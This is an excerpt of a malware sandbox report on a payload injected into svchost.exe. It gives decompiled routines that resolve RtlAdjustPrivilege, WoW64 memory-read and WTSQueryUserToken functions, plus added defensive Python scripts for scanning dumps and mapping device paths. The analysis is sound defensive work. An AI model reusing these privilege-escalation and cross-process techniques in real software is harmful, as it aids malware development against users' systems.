                                                            • Instruction Fuzzy Hash: CB817D23615B84D5EB728FA5E86C7D973A4FB44B88F404219DA9D07B8ADF3EC200C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Sleep$Local$AllocCreateEventFreeObjectSingleWait
                                                            • String ID: c$d$~
                                                            • API String ID: 824083382-1047207048
                                                            • Opcode ID: 87679f1f6eac7ddf4ba7d1ccb3e66183ab8783ea083e9ca94fa837566ebf0fc3
                                                            • Instruction ID: 4a741cf7397b528fa4759497a96d5cef8eb543376b34aa317947ca965c5d830c
                                                            • Opcode Fuzzy Hash: 87679f1f6eac7ddf4ba7d1ccb3e66183ab8783ea083e9ca94fa837566ebf0fc3
                                                            • Instruction Fuzzy Hash: 1C51DF37305B88A6EB268F99E8AC3ED77A1F385B81F444515CE4A07366CF7AC884C750
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoad
                                                            • String ID: SetProcessDPIAware$SetProcessDpiAwareness$SetProcessDpiAwarenessContext$Shcore.dll$User32.dll
                                                            • API String ID: 2238633743-2252252969
                                                            • Opcode ID: 6fb07f784bf1300ce02173238751f06859fc4310715d01e3aa513480e5ea284b
                                                            • Instruction ID: ba11a67416fe43bc9474787acfaacb66b69ec4b97145d76e4754b3339029f5eb
                                                            • Opcode Fuzzy Hash: 6fb07f784bf1300ce02173238751f06859fc4310715d01e3aa513480e5ea284b
                                                            • Instruction Fuzzy Hash: 7701ED53B02701B1FE779BD9B8AC3E53390AF457A0F8846288D2D463E6FF3AD5858250
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF55AEDC(void* __edx) {
                                                            				void* _t5;
                                                            
                                                            				_t5 = __edx;
                                                            				if (_t5 == 0) goto 0xaf55af1d;
                                                            				if (_t5 == 0) goto 0xaf55af11;
                                                            				if (_t5 == 0) goto 0xaf55af04;
                                                            				if (__edx == 1) goto 0xaf55aefd;
                                                            				return 1;
                                                            			}

                                                            Instruction addresses for the function above: 0x22baf55aee0 to 0x22baf55aefc

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_is_nonwritable_in_current_image__scrt_release_startup_lock
                                                            • String ID:
                                                            • API String ID: 4221786481-0
                                                            • Opcode ID: d13e06c18f5592721c8b6f5b4342ebe07dca7d90977a2cf645a194f5eec25d56
                                                            • Instruction ID: aa179a1fd4d7251c8caaede286655137d282e61f7cee0714b786a9ecdbd0b206
                                                            • Opcode Fuzzy Hash: d13e06c18f5592721c8b6f5b4342ebe07dca7d90977a2cf645a194f5eec25d56
                                                            • Instruction Fuzzy Hash: 1351C263604241B6FA3BABE5A98E3DD37A0EB85380F844415AA49477E7DF3FC546C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CriticalErrorLastSection$EnterLeave
                                                            • String ID:
                                                            • API String ID: 2124651672-0
                                                            • Opcode ID: fa4ffa5d86a2f893e9271250c461d635a5905b4895f717afca3ed6017ffe68fd
                                                            • Instruction ID: 2a82c747203447ad3728cf167bfe6b79f2c806db9938da7ba37bce7fbfaaaecc
                                                            • Opcode Fuzzy Hash: fa4ffa5d86a2f893e9271250c461d635a5905b4895f717afca3ed6017ffe68fd
                                                            • Instruction Fuzzy Hash: 4141C037201644E7EB62DFA0D08CA9D77B6F788794F460511CE6A83796DF3AC445CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Heap$Initialize$DescriptorFreeProcessSecurity$AccessAllocAllocateAllowedDaclLength
                                                            • String ID:
                                                            • API String ID: 1313825231-0
                                                            • Opcode ID: e57bf40501bcbdd38591dfe3bb83acb5636c22dcc319288e39fd584354930e7c
                                                            • Instruction ID: 0abe102b51fe9c861f0c8c45e578f57b4901b1420816fc449a221469d98c6a0a
                                                            • Opcode Fuzzy Hash: e57bf40501bcbdd38591dfe3bb83acb5636c22dcc319288e39fd584354930e7c
                                                            • Instruction Fuzzy Hash: B2415D33204785A7EB21CF92A85C79AB7A5FB88BD0F0445249E8957B29DF3EC446CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 77%
                                                            			E0000022B22BAF53B9F0(void* __ecx, void* __eflags, long long __rbx, void* __rdx, long long __rdi, void* __rsi, void* __r8) {
                                                            				void* _t43;
                                                            				signed long long _t52;
                                                            				long long _t71;
                                                            				void* _t74;
                                                            				signed int* _t75;
                                                            				void* _t77;
                                                            				signed long long _t78;
                                                            
                                                            				_t71 = __rdi;
                                                            				_t43 = __ecx;
                                                            				 *((long long*)(_t77 + 0x18)) = __rbx;
                                                            				_t75 = _t77 - 0x10;
                                                            				_t78 = _t77 - 0x110;
                                                            				_t52 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				 *_t75 = _t52 ^ _t78;
                                                            				 *((long long*)(_t78 + 0x128)) = __rdi;
                                                            				E0000022B22BAF538B60(_t52 ^ _t78, __rbx, _t78 + 0x50, __rdi, __rsi);
                                                            				 *((char*)(_t75 - 0x40)) = 0x43;
                                                            				 *((long long*)(_t75 - 0x60)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588810;
                                                            				 *((long long*)(_t75 - 0x50)) = _t71;
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf5887c8;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((intOrPtr*)(_t75 - 0x3c)) = 0;
                                                            				 *((long long*)(_t75 - 0x78)) = _t71;
                                                            				 *((long long*)(_t75 - 0x70)) = _t71;
                                                            				 *((long long*)(_t75 - 0x48)) = _t71;
                                                            				E0000022B22BAF53A030();
                                                            				r8d =  *0xaf5958f0 & 0x0000ffff;
                                                            				 *((long long*)(_t75 - 0x38)) = _t71;
                                                            				if (( *(_t75 - 0x10) & 0x0000ffff) != 1) goto 0xaf53bb24;
                                                            				 *((short*)(_t78 + 0x28)) = 0;
                                                            				r9d = 0;
                                                            				 *((long long*)(_t78 + 0x20)) = _t71;
                                                            				if ( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78))))))(_t74) != 0) goto 0xaf53bb8d;
                                                            				E0000022B22BAF53A220( *0xaf599c28 & 0xffff, _t78 + 0x50);
                                                            				if ( *((intOrPtr*)(_t75 - 0x28)) == 0) goto 0xaf53bace;
                                                            				E0000022B22BAF55A7E4( *((intOrPtr*)( *((intOrPtr*)(_t75 - 0x78)))),  *((intOrPtr*)(_t75 - 0x28)));
                                                            				 *((long long*)(_t75 - 0x58)) = 0xaf588690;
                                                            				 *((intOrPtr*)(_t75 - 0x18)) = 0;
                                                            				 *((long long*)(_t75 - 0x28)) = _t71;
                                                            				 *((long long*)(_t75 - 0x20)) = _t71;
                                                            				 *((long long*)(_t75 - 0x68)) = 0xaf588790;
                                                            				if ( *((intOrPtr*)(_t75 - 0x80)) == 0) goto 0xaf53bb05;
                                                            				E0000022B22BAF55A7E4(0xaf588790,  *((intOrPtr*)(_t75 - 0x80)));
                                                            				return E0000022B22BAF55A7C0(_t43, 0xaf588790,  *_t75 ^ _t78);
                                                            			}

                                                            Instruction addresses for the function above: 0x22baf53b9f0 to 0x22baf53bb23

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: AddressProc$LibraryLoadLocal$CloseCreateEventFreeHandleSizeSleep
                                                            • String ID: RtlAdjustPrivilege$ntdll.dll
                                                            • API String ID: 3641538898-64178277
                                                            • Opcode ID: 6b788b816d507ef0145bb2fe1a46bbcf9ffa9ae8f76f4aac0dcbea393d98246e
                                                            • Instruction ID: 83c4b2ed4284eec5db36808bef34f5d3c5e8ebd0dc29cd8aac29d05c31190134
                                                            • Opcode Fuzzy Hash: 6b788b816d507ef0145bb2fe1a46bbcf9ffa9ae8f76f4aac0dcbea393d98246e
                                                            • Instruction Fuzzy Hash: 0D716B33611B44A5EB22DFA4E8AC3DD73B4FB84798F100116DA8943B6ADF3AC145C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
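Three of the records in this section show the injected payload resolving API names at run time through LoadLibrary/GetProcAddress instead of its import table: NtWow64QueryInformationProcess64 and NtWow64ReadVirtualMemory64 from ntdll.dll (the record with API ID AddressHandleLibraryLoadModuleProc), RtlAdjustPrivilege from ntdll.dll (the record directly above), and the SetProcessDpiAware* family from User32.dll/Shcore.dll. Because the names are resolved dynamically they survive only as string constants inside the dumped region, which is what the String ID lines record. The script below is an added triage example, not part of the Joe Sandbox report or of the analysed sample: it scans a raw memory dump for those names in both ASCII and UTF-16LE, reports each hit as an address relative to the region base (0x22BAF530000, as given in the Memory Dump Source lines), and separates the two ntdll groups from the benign DPI calls. The dump bytes embedded in the script are constructed so it runs offline, and the one-line note attached to each watched name is an added label, not a finding from the report.

```python
"""Triage helper: find runtime-resolved API names in a raw memory dump.

Added example, not part of the Joe Sandbox report or the analysed sample.
The watch-list entries are the String IDs the report attaches to the
decompiled functions; the sample dump bytes are constructed for this script.
"""
from dataclasses import dataclass
from typing import Iterator, List

# Names the report shows being resolved with LoadLibrary/GetProcAddress.
# The annotation text is an added label, not a finding from the report.
WATCHLIST = {
    "NtWow64QueryInformationProcess64": "WoW64 cross-bitness process query",
    "NtWow64ReadVirtualMemory64": "WoW64 cross-bitness memory read",
    "RtlAdjustPrivilege": "undocumented token privilege toggle",
}

# Also listed in the report, but ordinary GUI setup; kept so the scanner
# shows how benign names are reported separately from the interesting ones.
BENIGN = {"SetProcessDPIAware", "SetProcessDpiAwareness",
          "SetProcessDpiAwarenessContext"}


@dataclass(frozen=True)
class Hit:
    name: str
    address: int       # region base + offset of the first byte of the string
    encoding: str      # "ascii" or "utf-16le"
    note: str          # watch-list annotation, or "benign"


def _is_ident_byte(b: int) -> bool:
    """ASCII letter, digit or underscore: the characters an API name is made of."""
    return (0x30 <= b <= 0x39) or (0x41 <= b <= 0x5A) or (0x61 <= b <= 0x7A) or b == 0x5F


def _ident_unit(unit: bytes, step: int) -> bool:
    """True if one code unit (1 byte ASCII, 2 bytes UTF-16LE) is an identifier char."""
    if len(unit) != step:
        return False          # end of buffer counts as a boundary
    if step == 2 and unit[1] != 0:
        return False          # not a Latin code unit, so not part of an API name
    return _is_ident_byte(unit[0])


def _find_all(hay: bytes, needle: bytes) -> Iterator[int]:
    i = hay.find(needle)
    while i >= 0:
        yield i
        i = hay.find(needle, i + 1)


def _hits(data: bytes, name: str, encoding: str) -> Iterator[int]:
    step = 1 if encoding == "ascii" else 2
    needle = name.encode(encoding)
    for i in _find_all(data, needle):
        end = i + len(needle)
        if _ident_unit(data[end:end + step], step):
            continue  # prefix of a longer name (e.g. ...Awareness vs ...AwarenessContext)
        # The leading boundary is only checked for ASCII: for UTF-16LE the two bytes
        # before a string (e.g. 's\0' ending a preceding ASCII string) look exactly like
        # a wide identifier character, so the same check would drop genuine hits.
        if step == 1 and i > 0 and _ident_unit(data[i - 1:i], 1):
            continue
        yield i


def scan_dump(data: bytes, base: int = 0) -> List[Hit]:
    """Return every watched or benign API name found in `data`, sorted by address."""
    hits: List[Hit] = []
    for name, note in WATCHLIST.items():
        for enc in ("ascii", "utf-16le"):
            hits.extend(Hit(name, base + off, enc, note) for off in _hits(data, name, enc))
    for name in BENIGN:
        for enc in ("ascii", "utf-16le"):
            hits.extend(Hit(name, base + off, enc, "benign") for off in _hits(data, name, enc))
    return sorted(hits, key=lambda h: (h.address, h.name))


def suspicious(hits: List[Hit]) -> List[Hit]:
    """Only the hits worth a second look (everything not labelled benign)."""
    return [h for h in hits if h.note != "benign"]


def scan_file(path: str, base: int = 0) -> List[Hit]:
    with open(path, "rb") as f:
        return scan_dump(f.read(), base)


# Constructed test dump: a few header bytes, then a string table of the kind the
# decompiled resolver functions index. Not taken from the real .sdmp file.
SAMPLE_DUMP = (
    b"MZ\x90\x00" + b"\x00" * 12
    + b"ntdll.dll\x00"
    + b"NtWow64QueryInformationProcess64\x00"
    + b"NtWow64ReadVirtualMemory64\x00"
    + b"SetProcessDpiAwareness\x00"
    + "RtlAdjustPrivilege".encode("utf-16le") + b"\x00\x00"
    + b"\xcc" * 8
)
SAMPLE_BASE = 0x22BAF530000  # region base from the report's Memory Dump Source line

if __name__ == "__main__":
    for h in scan_dump(SAMPLE_DUMP, SAMPLE_BASE):
        print(f"{h.address:#014x} {h.encoding:<8} {h.name:<34} {h.note}")
```

Run it against the real region with `scan_file("<dump>.sdmp", 0x22BAF530000)`; a hit on either NtWow64 name or on RtlAdjustPrivilege in an svchost.exe-hosted region is worth following up in the decompiled caller, whereas the DPI-awareness names alone are not.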

                                                            C-Code - Quality: 65%
                                                            			E0000022B22BAF547A60(signed long long __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, long long __r12, signed int __r15, long long _a24, long long _a32) {
                                                            				long long _v24;
                                                            				long long _v32;
                                                            				long long _v40;
                                                            				signed int _v56;
                                                            				void* _v584;
                                                            				short _v596;
                                                            				short _v600;
                                                            				void* _t37;
                                                            				void* _t45;
                                                            				signed int _t57;
                                                            				void* _t63;
                                                            				void* _t75;
                                                            				void* _t77;
                                                            				signed long long _t88;
                                                            				signed long long _t89;
                                                            				signed short* _t90;
                                                            				signed long long _t92;
                                                            				signed short* _t93;
                                                            				long long _t120;
                                                            				signed short* _t127;
                                                            				signed long long _t129;
                                                            				void* _t130;
                                                            
                                                            				_t120 = __rdi;
                                                            				_t88 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t89 = _t88 ^ _t129;
                                                            				_v56 = _t89;
                                                            				_t92 = __rcx;
                                                            				r8d = 0x208;
                                                            				E0000022B22BAF563830(_t63, 0, _t75, _t77, __rdx, __rdx, __rdi, _t130);
                                                            				r8d = 0x208;
                                                            				_t37 = E0000022B22BAF563830(_t63, 0, _t75, _t77,  &_v584, __rdx, _t120, _t130);
                                                            				r8d = 0x104;
                                                            				__imp__GetProcessImageFileNameW();
                                                            				if (_t37 == 0) goto 0xaf547c6f;
                                                            				if (GetLogicalDriveStringsW(??, ??) == 0) goto 0xaf547c6f;
                                                            				_a24 = __rbp;
                                                            				_v32 = __r12;
                                                            				_t90 =  <  ? 0xffffffff : _t89;
                                                            				E0000022B22BAF55A828(2 *  &_v584 >> 0x20, _t90);
                                                            				r8d = 2 + _t92 * 2;
                                                            				_t127 = _t90;
                                                            				E0000022B22BAF563830(0, 0, _t75, _t77, _t90,  &_v584, _t120, _t130);
                                                            				if (GetLogicalDriveStringsW(??, ??) != 0) goto 0xaf547b34;
                                                            				E0000022B22BAF55A7E4(_t90, _t127);
                                                            				goto 0xaf547c5f;
                                                            				_t45 = L" :"; // 0x3a0020
                                                            				_v600 = _t45;
                                                            				_v24 = _t120;
                                                            				_v596 =  *0xaf5894b0 & 0x0000ffff;
                                                            				_v40 = __r15;
                                                            				E0000022B22BAF55A828(0, _t127);
                                                            				_a32 = __rsi;
                                                            				_t93 = _t127;
                                                            				r15d = 1;
                                                            				r8d = 0x104;
                                                            				_v600 =  *_t93 & 0x0000ffff;
                                                            				if (QueryDosDeviceW(??, ??, ??) != 0) goto 0xaf547be3;
                                                            				if (GetLastError() != 0x7a) goto 0xaf547c37; // 0x7a = ERROR_INSUFFICIENT_BUFFER: grow the buffer and retry QueryDosDeviceW
                                                            				E0000022B22BAF55A7E4(_t90, _t90);
                                                            				_t91 =  <  ? 0xffffffff : _t90;
                                                            				E0000022B22BAF55A828(2 * __r15 >> 0x20,  <  ? 0xffffffff : _t90);
                                                            				r8d = r15d;
                                                            				if (QueryDosDeviceW(??, ??, ??) == 0) goto 0xaf547c37;
                                                            				r8d = lstrlenW(??);
                                                            				if (E0000022B22BAF564AA4( <  ? 0xffffffff : _t90,  &_v584, _t130) == 0) goto 0xaf547c19;
                                                            				_t57 =  *_t93 & 0x0000ffff;
                                                            				if (_t57 != 0) goto 0xaf547c02;
                                                            				if (_t93[1] != _t57) goto 0xaf547b80;
                                                            				goto 0xaf547c37;
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF55A7E4( <  ? 0xffffffff : _t90, _t127);
                                                            				E0000022B22BAF55A7E4(_t91, _t91);
                                                            				return E0000022B22BAF55A7C0( *_t93 & 0x0000ffff, _t91, _v56 ^ _t129);
                                                            			}
                                                            0x22baf547a60
                                                            0x22baf547a6b
                                                            0x22baf547a72
                                                            0x22baf547a75
                                                            0x22baf547a80
                                                            0x22baf547a88
                                                            0x22baf547a8e
                                                            0x22baf547a9a
                                                            0x22baf547aa0
                                                            0x22baf547aa5
                                                            0x22baf547ab3
                                                            0x22baf547abb
                                                            0x22baf547acf
                                                            0x22baf547ad8
                                                            0x22baf547ae5
                                                            0x22baf547af7
                                                            0x22baf547afe
                                                            0x22baf547b03
                                                            0x22baf547b10
                                                            0x22baf547b13
                                                            0x22baf547b25
                                                            0x22baf547b2a
                                                            0x22baf547b2f
                                                            0x22baf547b34
                                                            0x22baf547b3f
                                                            0x22baf547b4a
                                                            0x22baf547b52
                                                            0x22baf547b57
                                                            0x22baf547b5f
                                                            0x22baf547b67
                                                            0x22baf547b6f
                                                            0x22baf547b72
                                                            0x22baf547b83
                                                            0x22baf547b89
                                                            0x22baf547b9e
                                                            0x22baf547ba9
                                                            0x22baf547bb2
                                                            0x22baf547bbf
                                                            0x22baf547bc6
                                                            0x22baf547bcb
                                                            0x22baf547be1
                                                            0x22baf547bec
                                                            0x22baf547c00
                                                            0x22baf547c02
                                                            0x22baf547c0c
                                                            0x22baf547c11
                                                            0x22baf547c17
                                                            0x22baf547c31
                                                            0x22baf547c3a
                                                            0x22baf547c42
                                                            0x22baf547c89

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: DeviceDriveLogicalQueryStrings$ErrorFileImageLastNameProcesslstrlen
                                                            • String ID: %s%s
                                                            • API String ID: 2329635748-3252725368
                                                            • Opcode ID: f951ea32a3a171d581cd91cf2e3b1e39595b18b2d4264ef30d8f547b1439f873
                                                            • Instruction ID: 409c4ebb18fad8a94f0723a0e7e8bc5b01e6b16930a66231d6c90d10d245af12
                                                            • Opcode Fuzzy Hash: f951ea32a3a171d581cd91cf2e3b1e39595b18b2d4264ef30d8f547b1439f873
                                                            • Instruction Fuzzy Hash: 1C516E32714680A5EB71DBA2A84D3EA73A1FB89BC1F444115DD5A87B9BEF3EC105C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%
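The routine at 0x22baf547a60 is the standard conversion of an NT device path to a drive-letter path. The block below is an added example in Python, not code from the sample or from the Joe Sandbox report: the function names and the DEVICE_MAP table are constructed for illustration, and the reading of the helper that receives lstrlenW's result as a plain length-limited prefix compare is an assumption. It shows the conversion next to the boundary bug such a compare has when both HarddiskVolume1 and HarddiskVolume10 exist on the host.

```python
# Added example, not code from the sample or from the Joe Sandbox report: a
# cleanroom model of the device-path-to-DOS-path routine at 0x22baf547a60.
# Function and variable names here are our own.
#
# GetProcessImageFileNameW returns a path rooted at an NT device name, e.g.
# \Device\HarddiskVolume2\Windows\System32\svchost.exe. The sample resolves it
# by calling QueryDosDeviceW(L"C:"), QueryDosDeviceW(L"D:"), ... and matching
# each returned device name against the start of the image path. DEVICE_MAP is
# a constructed stand-in for those QueryDosDeviceW results.
from typing import Dict, Optional, Tuple

DEVICE_MAP: Dict[str, str] = {
    "C:": r"\Device\HarddiskVolume1",
    "D:": r"\Device\HarddiskVolume10",
    "E:": r"\Device\CdRom0",
}


def naive_nt_path_to_dos(nt_path: str, device_map: Dict[str, str] = DEVICE_MAP) -> Optional[str]:
    """Length-limited prefix compare, the shape the decompiled helper appears to
    have (it is handed lstrlenW(device) as the length). Returns the first hit."""
    for drive, device in device_map.items():
        if nt_path[: len(device)].lower() == device.lower():
            return drive + nt_path[len(device):]      # wsprintfW(L"%s%s", drive, rest)
    return None


def nt_path_to_dos(nt_path: str, device_map: Dict[str, str] = DEVICE_MAP) -> Optional[str]:
    """Same mapping, but the device name must end at a path separator and the
    longest matching device wins (volume mount points nest under a drive)."""
    best: Optional[Tuple[str, str, str]] = None
    for drive, device in device_map.items():
        if nt_path[: len(device)].lower() != device.lower():
            continue
        rest = nt_path[len(device):]
        if rest and not rest.startswith("\\"):
            continue                                  # HarddiskVolume1 vs HarddiskVolume10
        if best is None or len(device) > len(best[1]):
            best = (drive, device, rest)
    if best is None:
        return None
    drive, _, rest = best
    return drive + rest


if __name__ == "__main__":
    p = r"\Device\HarddiskVolume10\Users\Public\file.exe"
    print(naive_nt_path_to_dos(p))   # C:0\Users\Public\file.exe  (wrong drive, mangled path)
    print(nt_path_to_dos(p))         # D:\Users\Public\file.exe
```

When reconstructing the sample's on-disk location from a dump or from Sysmon/ETW records, resolve the device names on the same host: volume numbering differs between machines, so a table copied from another system gives the wrong drive letter.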

                                                            C-Code - Quality: 100%
                                                            			E0000022B22BAF572C18(void* __edx, char* __r8, void* __r9) {
                                                            				void* _t7;
                                                            				signed long long _t11;
                                                            				signed long long _t12;
                                                            				void* _t17;
                                                            
                                                            				_t16 = _t17 - 0x4f;
                                                            				_t18 = _t17 - 0xc0;
                                                            				_t11 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t12 = _t11 ^ _t17 - 0x000000c0;
                                                            				 *(_t17 - 0x4f + 0x3f) = _t12;
                                                            				if (__r9 - _t12 + 4 >= 0) goto 0xaf572c64;
                                                            				 *__r8 = 0;
                                                            				return E0000022B22BAF55A7C0(_t7, _t12 + 4,  *(_t16 + 0x3f) ^ _t18);
                                                            			}
                                                            0x22baf572c1a
                                                            0x22baf572c1f
                                                            0x22baf572c26
                                                            0x22baf572c2d
                                                            0x22baf572c30
                                                            0x22baf572c44
                                                            0x22baf572c46
                                                            0x22baf572c63

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo
                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                            • API String ID: 3215553584-2617248754
                                                            • Opcode ID: 717ece5167fd6c951f5009bca1d53894e83ab193da7e4a35b3170f996bbe70de
                                                            • Instruction ID: d28575ec8c3483aeb6cc7ad6544c825b8d2136254aca5fbb33bdc63d4ffa0b8d
                                                            • Opcode Fuzzy Hash: 717ece5167fd6c951f5009bca1d53894e83ab193da7e4a35b3170f996bbe70de
                                                            • Instruction Fuzzy Hash: 8041AB33601B44A9FB26CFA5E8497CD37A4E714798F414526AE5C07B96EF3AC025C780
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$EnumOpenValue$CreateQuerywsprintf
                                                            • String ID: SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2517750250-1183003970
                                                            • Opcode ID: 0b0d1f2f2df76f6e39eef6271e450b7f8c4fa86827dcbf492fab52204f325640
                                                            • Instruction ID: 557dbae4e8d9bf0c88b687044ea8649c5bd2cfb8642157f38bc75d4ab09986a3
                                                            • Opcode Fuzzy Hash: 0b0d1f2f2df76f6e39eef6271e450b7f8c4fa86827dcbf492fab52204f325640
                                                            • Instruction Fuzzy Hash: 40515B73218B94E2EB31CF91F48C78AB7A5F7C4B94F500116EA8943A6ADF79C549CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Create$AllocateBlockCheckEnvironmentFreeInitializeMembershipProcessToken$AddressDestroyLibraryLoadProcUser
                                                            • String ID: WTSQueryUserToken$Wtsapi32.dll$h
                                                            • API String ID: 2971248214-4267400122
                                                            • Opcode ID: eaae5b69d0bd3c2b151fb193475a8a4b98db6a0384027639bbee685d1e0eb02e
                                                            • Instruction ID: ee4a9a028f3bd352a6c5b71fd232edf202d6ed72f29ad23619290e9b56787438
                                                            • Opcode Fuzzy Hash: eaae5b69d0bd3c2b151fb193475a8a4b98db6a0384027639bbee685d1e0eb02e
                                                            • Instruction Fuzzy Hash: BD414133604B85A6EB719F95F4483DAB3A5F788785F444529EACE43B5AEF39C094CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 28%
                                                            			// Reads a value under SOFTWARE\Classes\CLSID\%s (the %s is formatted by wsprintfW from the buffer filled by
                                                            			// E0000022B22BAF549800) and, if the read succeeds and the value passes the check below, opens the event
                                                            			// Global\%s built from the second format string, closing the handle if it exists. This is a presence check, not a wait.
                                                            			E0000022B22BAF54BFA0(void* __eflags, void* __rcx) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				void* _v648;
                                                            				char _v656;
                                                            				char _v660;
                                                            				char _v664;
                                                            				long long _v672;
                                                            				long long _v680;
                                                            				void* __rbx;
                                                            				void* _t44;
                                                            				void* _t51;
                                                            				void* _t52;
                                                            				signed long long _t60;
                                                            				long long _t64;
                                                            				long long _t65;
                                                            				void* _t81;
                                                            				void* _t82;
                                                            				signed long long _t83;
                                                            
                                                            				_t60 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t60 ^ _t83;
                                                            				E0000022B22BAF549800(_t65, __rcx,  &_v632, _t82);
                                                            				_v660 = 4;
                                                            				_v664 = 0;
                                                            				wsprintfW(??, ??);
                                                            				r8d = _v660;
                                                            				E0000022B22BAF563830(_t44, 0, _t51, _t52,  &_v664, L"SOFTWARE\\Classes\\CLSID\\%s", _t81,  &_v632);
                                                            				_v656 = _t65;
                                                            				r9d = 0x20119; // samDesired = KEY_READ | KEY_WOW64_64KEY (0x20019 | 0x0100)
                                                            				_v680 =  &_v656;
                                                            				r8d = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54c0d2;
                                                            				_v672 =  &_v660;
                                                            				_t64 =  &_v664;
                                                            				r8d = 0;
                                                            				_v680 = _t64;
                                                            				RegQueryValueExW(??, ??, ??, ??, ??, ??);
                                                            				_t43 =  ==  ? 1 : 0;
                                                            				RegCloseKey(??);
                                                            				_t56 =  ==  ? 1 : 0;
                                                            				if (( ==  ? 1 : 0) == 0) goto 0xaf54c0d2;
                                                            				_v664 = _v664 + 0xfffffec4;
                                                            				if ((_v656 - 0x1fffffff & 0xefffffff) == 0) goto 0xaf54c0f1;
                                                            				wsprintfW(??, ??);
                                                            				OpenEventW(??, ??, ??);
                                                            				if (_t64 == 0) goto 0xaf54c0ef;
                                                            				CloseHandle(??);
